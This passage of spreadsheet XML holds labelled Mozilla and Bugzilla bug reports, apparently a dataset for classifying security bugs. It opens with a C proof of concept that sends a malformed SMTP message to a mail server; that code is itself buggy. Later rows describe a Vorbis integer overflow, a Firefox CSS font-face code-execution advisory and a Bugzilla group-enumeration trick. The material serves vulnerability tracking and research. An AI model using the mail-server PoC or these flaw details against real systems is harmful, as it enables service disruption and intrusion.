#include &lt;stdio.h&gt;
#include &lt;strings.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;netdb.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;unistd.h&gt;
#include &lt;signal.h&gt;
#define MX "localhost"
#define EHLO "EHLO mx\r\n"
#define MAIL "MAIL FROM: root@localhost\r\n"
#define RCPT "RCPT TO: root@localhost\r\n"
#define DATA "DATA\r\n"
#define QUIT "QUIT\r\n"
#define PORT 25
int sock;
char buffer[255];
void SigCatch() {
    fprintf(stderr,"\b\bbye!\n");
    close(sock);
    free(buffer);
    exit(0);
}
int main() {
    /* I was too lame to implement the command line... :) */
    int i;
    struct sockaddr_in sout;
    struct hostent *hp;
    signal(SIGINT,SigCatch);
    hp=gethostbyname(MX);
    sock=socket(AF_INET,SOCK_STREAM,0);
    if (sock&lt;0) {
        perror("sock");
        return -1;
    }
    sout.sin_family=AF_INET;
    sout.sin_port=htons(PORT);
    memcpy(&amp;(sout.sin_addr),*(hp-&gt;h_addr_list),sizeof(struct in_addr));
    if (connect(sock,&amp;sout,sizeof(sout))&lt;0) {
        perror("connect");
        return -1;
    }
    recv(sock,buffer,255,MSG_OOB); /* receive the banner... */
    fprintf(stderr,buffer);
    send(sock,EHLO,sizeof(EHLO),MSG_OOB);
    recv(sock,buffer,255,MSG_OOB); /* receive the welcome message... */
    fprintf(stderr,buffer);
    send(sock,MAIL,sizeof(MAIL),MSG_OOB);
    recv(sock,buffer,255,MSG_OOB); /* receive the acknowledgement to mail from. */
    fprintf(stderr,buffer);
    send(sock,RCPT,sizeof(RCPT),MSG_OOB);
    recv(sock,buffer,255,MSG_OOB); /* idem, but for the rcpt to... */
    fprintf(stderr,buffer);
    send(sock,DATA,sizeof(DATA),MSG_OOB);
    recv(sock,buffer,255,0);
    fprintf(stderr,buffer);
    i=sprintf(buffer,"b4d maIl 1n
4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20");
    *(buffer+i)="\x0";
    sprintf(buffer+i+1,"\n.\n");
    send(sock,buffer,i+1+3,0); /* send the dumb thing ... */
    recv(sock,buffer,255,MSG_OOB);
    fprintf(stderr,buffer);
    send(sock,QUIT,sizeof(QUIT),MSG_OOB);
    recv(sock,buffer,255,MSG_OOB);
    fprintf(stderr,buffer);
    close(sock);
    return 0;
}</t>
        </is>
      </c>
      <c r="X5841" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5842">
      <c r="A5842" t="n">
        <v>95235</v>
      </c>
      <c r="B5842" t="inlineStr">
        <is>
          <t>2001-08-14 06:47:47 -0700</t>
        </is>
      </c>
      <c r="C5842" t="inlineStr">
        <is>
          <t>Insecure variables passed to DisplayError() from buglist.cgi</t>
        </is>
      </c>
      <c r="D5842" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:25 -0800</t>
        </is>
      </c>
      <c r="E5842" t="n">
        <v>1</v>
      </c>
      <c r="F5842" t="n">
        <v>1</v>
      </c>
      <c r="G5842" t="n">
        <v>4</v>
      </c>
      <c r="H5842" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5842" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5842" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5842" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5842" t="inlineStr">
        <is>
          <t>Sun</t>
        </is>
      </c>
      <c r="M5842" t="inlineStr">
        <is>
          <t>SunOS</t>
        </is>
      </c>
      <c r="N5842" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5842" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5842" t="inlineStr"/>
      <c r="Q5842" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5842" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5842" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T5842" t="n">
        <v>1</v>
      </c>
      <c r="U5842" t="n">
        <v>0</v>
      </c>
      <c r="V5842" t="n">
        <v>12</v>
      </c>
      <c r="W5842" t="inlineStr">
        <is>
          <t>Apologies if this is a duplicate, but querying bugzilla is broken at the moment,
so I can't check.
The SqlifyDate() routine has the following:
&gt;&gt;   if (!defined $date) {
&gt;&gt;        PuntTryAgain("The string '&lt;tt&gt;$str&lt;/tt&gt;' is not a legal date.");
Should there be either a html_quote(), or a value_quote() around the $str?</t>
        </is>
      </c>
      <c r="X5842" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5843">
      <c r="A5843" t="n">
        <v>837324</v>
      </c>
      <c r="B5843" t="inlineStr">
        <is>
          <t>2013-02-01 16:15:09 -0800</t>
        </is>
      </c>
      <c r="C5843" t="inlineStr">
        <is>
          <t>WebRTC crash [@fsmdef_ev_addcandidate]</t>
        </is>
      </c>
      <c r="D5843" t="inlineStr">
        <is>
          <t>2013-11-25 16:41:11 -0800</t>
        </is>
      </c>
      <c r="E5843" t="n">
        <v>1</v>
      </c>
      <c r="F5843" t="n">
        <v>1</v>
      </c>
      <c r="G5843" t="n">
        <v>3</v>
      </c>
      <c r="H5843" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5843" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5843" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K5843" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5843" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5843" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5843" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5843" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5843" t="inlineStr">
        <is>
          <t>[WebRTC][blocking-webrtc+][adv-main21+]</t>
        </is>
      </c>
      <c r="Q5843" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5843" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5843" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T5843" t="n">
        <v>1</v>
      </c>
      <c r="U5843" t="n">
        <v>0</v>
      </c>
      <c r="V5843" t="n">
        <v>32</v>
      </c>
      <c r="W5843" t="inlineStr">
        <is>
          <t>Created attachment 709282
callstack
Click "start" to reproduce.
Tested with m-c changeset: 120354:2cc710018b14</t>
        </is>
      </c>
      <c r="X5843" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5844">
      <c r="A5844" t="n">
        <v>1549717</v>
      </c>
      <c r="B5844" t="inlineStr">
        <is>
          <t>2019-05-07 06:57:25 -0700</t>
        </is>
      </c>
      <c r="C5844" t="inlineStr">
        <is>
          <t>minidump-stackwalk fails assertion and crashes</t>
        </is>
      </c>
      <c r="D5844" t="inlineStr">
        <is>
          <t>2019-05-13 12:16:44 -0700</t>
        </is>
      </c>
      <c r="E5844" t="n">
        <v>1</v>
      </c>
      <c r="F5844" t="n">
        <v>1</v>
      </c>
      <c r="G5844" t="n">
        <v>4</v>
      </c>
      <c r="H5844" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5844" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5844" t="inlineStr">
        <is>
          <t>Processor</t>
        </is>
      </c>
      <c r="K5844" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5844" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5844" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5844" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5844" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5844" t="inlineStr"/>
      <c r="Q5844" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5844" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5844" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5844" t="n">
        <v>1</v>
      </c>
      <c r="U5844" t="n">
        <v>0</v>
      </c>
      <c r="V5844" t="n">
        <v>18</v>
      </c>
      <c r="W5844" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1549201 +++
minidump-stackwalk is segfaulting in the processor container. It creates a core file and the core files are accumulating which leads to a full disk which then leads to processing crash reports incorrectly. The latter part is covered in bug #1549201.
This bug covers figuring out why it's segfaulting. It could be multiple reasons.</t>
        </is>
      </c>
      <c r="X5844" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5845">
      <c r="A5845" t="n">
        <v>417048</v>
      </c>
      <c r="B5845" t="inlineStr">
        <is>
          <t>2008-02-12 11:46:37 -0800</t>
        </is>
      </c>
      <c r="C5845" t="inlineStr">
        <is>
          <t>[SECURITY] Boolean charts let me query for users being in any given group</t>
        </is>
      </c>
      <c r="D5845" t="inlineStr">
        <is>
          <t>2010-08-05 21:39:44 -0700</t>
        </is>
      </c>
      <c r="E5845" t="n">
        <v>1</v>
      </c>
      <c r="F5845" t="n">
        <v>1</v>
      </c>
      <c r="G5845" t="n">
        <v>4</v>
      </c>
      <c r="H5845" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5845" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5845" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K5845" t="inlineStr">
        <is>
          <t>2.19.1</t>
        </is>
      </c>
      <c r="L5845" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5845" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5845" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5845" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5845" t="inlineStr"/>
      <c r="Q5845" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5845" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5845" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T5845" t="n">
        <v>1</v>
      </c>
      <c r="U5845" t="n">
        <v>0</v>
      </c>
      <c r="V5845" t="n">
        <v>15</v>
      </c>
      <c r="W5845" t="inlineStr">
        <is>
          <t>"ReportedBy" "is equals to" "%group.admin%" returns all bugs where the reporter is in the admin group, despite I'm not in the admin group and despite I cannot access editusers.cgi (as I cannot bless anybody). AFAIK, such data should be restricted to power users who can access editusers.cgi. Moreover, query.cgi throws an error if I type a group name which doesn't exist, so I can use this trick to guess existing groups.
IMO, query.cgi should only let you enter group names you belong to, nothing more. Talking about this with dveditz and justdave on IRC, they both think it's not a problem on b.m.o, because they don't matter if people know who is in which group, but it may matter for some other installations, which is why I restricting this bug to the security group.
The %group.foo% group substitution feature has been implemented in Bugzilla 2.20 in bug 244239, so this problem exists for a long time.</t>
        </is>
      </c>
      <c r="X5845" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5846">
      <c r="A5846" t="n">
        <v>158868</v>
      </c>
      <c r="B5846" t="inlineStr">
        <is>
          <t>2002-07-23 09:00:24 -0700</t>
        </is>
      </c>
      <c r="C5846" t="inlineStr">
        <is>
          <t>Bad interline spacing when minimum font size is set (need to scale line-height)</t>
        </is>
      </c>
      <c r="D5846" t="inlineStr">
        <is>
          <t>2012-09-04 08:19:33 -0700</t>
        </is>
      </c>
      <c r="E5846" t="n">
        <v>1</v>
      </c>
      <c r="F5846" t="n">
        <v>1</v>
      </c>
      <c r="G5846" t="n">
        <v>3</v>
      </c>
      <c r="H5846" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5846" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5846" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K5846" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5846" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5846" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N5846" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5846" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5846" t="inlineStr"/>
      <c r="Q5846" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5846" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5846" t="inlineStr">
        <is>
          <t>mozilla1.5beta</t>
        </is>
      </c>
      <c r="T5846" t="n">
        <v>1</v>
      </c>
      <c r="U5846" t="n">
        <v>3</v>
      </c>
      <c r="V5846" t="n">
        <v>36</v>
      </c>
      <c r="W5846" t="inlineStr">
        <is>
          <t>When viewing page http://www.atptennis.com/en/default.asp, with minimum font
size for "Western" set to anything except "None", text is shown with incorrect
interline spacing.
When manually decreasing font size (Ctrl '-'), lines begin to be shown on top of
the previous lines, i.e. font size is not decreased but interline spacing is
decreased.
The same happens with some other sites as well:
http://www.cnn.com/ (left sidebar)
http://www.gazeta.ru/
http://websearch.about.com/ (left sidebar)
I'm using Mozilla 1.1b Win2000</t>
        </is>
      </c>
      <c r="X5846" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5847">
      <c r="A5847" t="n">
        <v>515889</v>
      </c>
      <c r="B5847" t="inlineStr">
        <is>
          <t>2009-09-10 23:12:45 -0700</t>
        </is>
      </c>
      <c r="C5847" t="inlineStr">
        <is>
          <t>Possible overflow in Vorbis_cookbook.c</t>
        </is>
      </c>
      <c r="D5847" t="inlineStr">
        <is>
          <t>2009-11-09 18:35:32 -0800</t>
        </is>
      </c>
      <c r="E5847" t="n">
        <v>1</v>
      </c>
      <c r="F5847" t="n">
        <v>1</v>
      </c>
      <c r="G5847" t="n">
        <v>3</v>
      </c>
      <c r="H5847" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5847" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5847" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5847" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5847" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5847" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5847" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5847" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5847" t="inlineStr">
        <is>
          <t>[sg:dupe 501279] already fixed upstream</t>
        </is>
      </c>
      <c r="Q5847" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5847" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5847" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5847" t="n">
        <v>1</v>
      </c>
      <c r="U5847" t="n">
        <v>0</v>
      </c>
      <c r="V5847" t="n">
        <v>10</v>
      </c>
      <c r="W5847" t="inlineStr">
        <is>
          <t>Dan Kaminsky reported an issue with Vorbis to Monty of xiph.org that could possibly affect Firefox.
--------------------
 Monty,
    Looking through your code as embedded in FF3.5, I see in Vorbis_cookbook.c something that might be a problem:
 /* unpacks a codebook from the packet buffer into the codebook struct,
    readies the codebook auxiliary structures for decode *************/
 int vorbis_staticbook_unpack(oggpack_buffer *opb,static_codebook *s){
 ...
  /* first the basic parameters */
   s-&gt;dim=oggpack_read(opb,16); // unbound, 0 to 2**16-1
   s-&gt;entries=oggpack_read(opb,24); // unbound, 0 to 2**24-1 (must not be 1)
   if(s-&gt;entries==-1)goto _eofout;
 ...
   switch((int)oggpack_read(opb,1)){
   case 0:
 ...
   case 1:
 ...
   /* Do we have a mapping to unpack? */
   switch((s-&gt;maptype=oggpack_read(opb,4))){
   case 0:
 ...
   case 1: case 2:
       switch(s-&gt;maptype){
       case 1:
 ...
       case 2:
     quantvals=s-&gt;entries*s-&gt;dim; // 2**16-1 * 2**24-1 overflows, and probably affects things elsewhere in code, but...
     break;
       }
       /* quantized values */
       s-&gt;quantlist=_ogg_malloc(sizeof(*s-&gt;quantlist)*quantvals); // this is the useful overflow
       for(i=0;i&lt;quantvals;i++)
     s-&gt;quantlist[i]=oggpack_read(opb,s-&gt;q_quant); //will read arbitrary values into RAM, 41 41 00 00 style.
 Mind taking a look?  Attacker seems to have two options; first, write lots of memory, second, make quantvals negative thus leaving the quantization tables unallocated (and skipping any likely AV's).</t>
        </is>
      </c>
      <c r="X5847" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5848">
      <c r="A5848" t="n">
        <v>148674</v>
      </c>
      <c r="B5848" t="inlineStr">
        <is>
          <t>2002-06-02 14:20:36 -0700</t>
        </is>
      </c>
      <c r="C5848" t="inlineStr">
        <is>
          <t>Boolean Charts don't work in Netpositive because '-' is sent as '%2D'</t>
        </is>
      </c>
      <c r="D5848" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:30 -0800</t>
        </is>
      </c>
      <c r="E5848" t="n">
        <v>1</v>
      </c>
      <c r="F5848" t="n">
        <v>1</v>
      </c>
      <c r="G5848" t="n">
        <v>4</v>
      </c>
      <c r="H5848" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5848" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5848" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K5848" t="inlineStr">
        <is>
          <t>2.14.1</t>
        </is>
      </c>
      <c r="L5848" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5848" t="inlineStr">
        <is>
          <t>BeOS</t>
        </is>
      </c>
      <c r="N5848" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5848" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5848" t="inlineStr">
        <is>
          <t>applied to 2.14.2</t>
        </is>
      </c>
      <c r="Q5848" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5848" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5848" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T5848" t="n">
        <v>1</v>
      </c>
      <c r="U5848" t="n">
        <v>0</v>
      </c>
      <c r="V5848" t="n">
        <v>14</v>
      </c>
      <c r="W5848" t="inlineStr">
        <is>
          <t>We need to treat this url:
http://bugzilla.mozilla.org/buglist.cgi?&amp;product=Bugzilla&amp;product=Webtools&amp;
field0%2D0%2D0=groupset&amp;type0%2D0%2D0=equals&amp;value0%2D0%2D0=512
the same as we treat this url:
http://bugzilla.mozilla.org/buglist.cgi?&amp;product=Bugzilla&amp;product=Webtools&amp;
field0-0-0=groupset&amp;type0-0-0=equals&amp;value0-0-0=512
User-Agent: Mozilla/3.0 (compatible; NetPositive/2.2)
Be lenient in what you accept.</t>
        </is>
      </c>
      <c r="X5848" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5849">
      <c r="A5849" t="n">
        <v>1719088</v>
      </c>
      <c r="B5849" t="inlineStr">
        <is>
          <t>2021-07-04 03:12:11 -0700</t>
        </is>
      </c>
      <c r="C5849" t="inlineStr">
        <is>
          <t>Firefox for Android Lock Exit Fullscreen Mode with Recursive iFrame</t>
        </is>
      </c>
      <c r="D5849" t="inlineStr">
        <is>
          <t>2024-05-30 10:34:23 -0700</t>
        </is>
      </c>
      <c r="E5849" t="n">
        <v>1</v>
      </c>
      <c r="F5849" t="n">
        <v>1</v>
      </c>
      <c r="G5849" t="n">
        <v>3</v>
      </c>
      <c r="H5849" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5849" t="inlineStr">
        <is>
          <t>GeckoView</t>
        </is>
      </c>
      <c r="J5849" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5849" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5849" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5849" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5849" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5849" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5849" t="inlineStr">
        <is>
          <t>[keep hidden while bug 1718796 is][reporter-external] [client-bounty-form] [verif?][adv-main91+]</t>
        </is>
      </c>
      <c r="Q5849" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5849" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5849" t="inlineStr">
        <is>
          <t>92 Branch</t>
        </is>
      </c>
      <c r="T5849" t="n">
        <v>1</v>
      </c>
      <c r="U5849" t="n">
        <v>0</v>
      </c>
      <c r="V5849" t="n">
        <v>22</v>
      </c>
      <c r="W5849" t="inlineStr">
        <is>
          <t>Created attachment 9229653
fullscreen-persistent.fenix.html
When I try to reproduce Bug 1718796 in Firefox for Android, after the browser goes into fullscreen mode I unable to exit the fullscreen using back button, the fullscreen mode is persistent it still persist even navigate to different origin.
Currently the testcase is still intermittent, so there is still chance to able to exit the fullscreen,
probably timing between iFrame element target and entering fullscreen.
## Tested on:
 - Firefox Nightly 91.0a1 (Build #2015819979)
 - Firefox Beta 90.0.0-beta.6 (Build #2015818371)
 - Firefox 89.1.1 (Build #2015812947)
## Steps to reproduce:
1. Visit attached fullscreen-persistent.fenix.html
2. Single tap or double tap on the page
3. When browser goes into fullscreen
4. Press back button repeatedly
5. The browser won't exit the fullscreen, if otherwise after press back try to tap the page again.</t>
        </is>
      </c>
      <c r="X5849" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5850">
      <c r="A5850" t="n">
        <v>290414</v>
      </c>
      <c r="B5850" t="inlineStr">
        <is>
          <t>2005-04-14 19:15:38 -0700</t>
        </is>
      </c>
      <c r="C5850" t="inlineStr">
        <is>
          <t>bz_index_info is slightly broken and has unclear API</t>
        </is>
      </c>
      <c r="D5850" t="inlineStr">
        <is>
          <t>2005-04-14 22:49:57 -0700</t>
        </is>
      </c>
      <c r="E5850" t="n">
        <v>1</v>
      </c>
      <c r="F5850" t="n">
        <v>1</v>
      </c>
      <c r="G5850" t="n">
        <v>4</v>
      </c>
      <c r="H5850" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5850" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5850" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K5850" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L5850" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5850" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5850" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5850" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5850" t="inlineStr"/>
      <c r="Q5850" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5850" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5850" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T5850" t="n">
        <v>1</v>
      </c>
      <c r="U5850" t="n">
        <v>0</v>
      </c>
      <c r="V5850" t="n">
        <v>4</v>
      </c>
      <c r="W5850" t="inlineStr">
        <is>
          <t>bz_index_info claims that it will always return a hashref, but it doesn't. It
should, though.
Also, it dies if a table exists, but there are no indexes on that table.
Instead, it should just return undef.</t>
        </is>
      </c>
      <c r="X5850" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5851">
      <c r="A5851" t="n">
        <v>801114</v>
      </c>
      <c r="B5851" t="inlineStr">
        <is>
          <t>2012-10-12 14:56:23 -0700</t>
        </is>
      </c>
      <c r="C5851" t="inlineStr">
        <is>
          <t>JSDebugErrorHook could trigger GC out of OOM handler</t>
        </is>
      </c>
      <c r="D5851" t="inlineStr">
        <is>
          <t>2014-11-19 19:35:51 -0800</t>
        </is>
      </c>
      <c r="E5851" t="n">
        <v>1</v>
      </c>
      <c r="F5851" t="n">
        <v>1</v>
      </c>
      <c r="G5851" t="n">
        <v>3</v>
      </c>
      <c r="H5851" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5851" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5851" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5851" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5851" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5851" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5851" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5851" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5851" t="inlineStr">
        <is>
          <t>[adv-main19+]</t>
        </is>
      </c>
      <c r="Q5851" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5851" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5851" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T5851" t="n">
        <v>1</v>
      </c>
      <c r="U5851" t="n">
        <v>0</v>
      </c>
      <c r="V5851" t="n">
        <v>5</v>
      </c>
      <c r="W5851" t="inlineStr">
        <is>
          <t>SpiderMonkey's GC is not prepared to handle this case.
The JSDebugErrorHook is only used by JSD, which is only used by Firebug.  We need to ensure that Firebug does nothing that could trigger GC in this path (including running any JS code).  We should remove this callback from the OOM path for future versions.  Since there isn't much of anything useful that Firebug (or anyone) could do with an OOM callback, I doubt this will be problematic.
Honza, do you see any problems from Firebug's perspective if we just remove this callback from js_ReportOutOfMemory?</t>
        </is>
      </c>
      <c r="X5851" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5852">
      <c r="A5852" t="n">
        <v>574059</v>
      </c>
      <c r="B5852" t="inlineStr">
        <is>
          <t>2010-06-23 11:28:27 -0700</t>
        </is>
      </c>
      <c r="C5852" t="inlineStr">
        <is>
          <t>nsCSSValue::Array index integer overflow (can lead to remote code execution via CSS font-face) (ZDI-CAN-831)</t>
        </is>
      </c>
      <c r="D5852" t="inlineStr">
        <is>
          <t>2010-08-10 12:09:37 -0700</t>
        </is>
      </c>
      <c r="E5852" t="n">
        <v>1</v>
      </c>
      <c r="F5852" t="n">
        <v>1</v>
      </c>
      <c r="G5852" t="n">
        <v>3</v>
      </c>
      <c r="H5852" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5852" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5852" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K5852" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5852" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5852" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5852" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5852" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5852" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5852" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5852" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5852" t="inlineStr">
        <is>
          <t>mozilla2.0b1</t>
        </is>
      </c>
      <c r="T5852" t="n">
        <v>1</v>
      </c>
      <c r="U5852" t="n">
        <v>0</v>
      </c>
      <c r="V5852" t="n">
        <v>14</v>
      </c>
      <c r="W5852" t="inlineStr">
        <is>
          <t>Created attachment 453442
PoC generator (python-based)
ZDI-CAN-831: Mozilla Firefox CSS font-face Remote Code Execution Vulnerability
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following 
products:
    Mozilla Firefox 3.6.x
-- VULNERABILITY DETAILS -----------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.
The specific flaw exists within handling of references to external font
resources. A value is used as a 16 bit integer in an array allocation
and later as 32 bit when iterating over and then populating these
fields. By creating enough references, a remote attacker can exploit
this vulnerability to execute arbitrary code under the context of the
browser.
Version(s)  tested: 
00400000 004e0000   firefox    (deferred)             
    Image path: C:\Program Files\Mozilla Firefox\firefox.exe
    Image name: firefox.exe
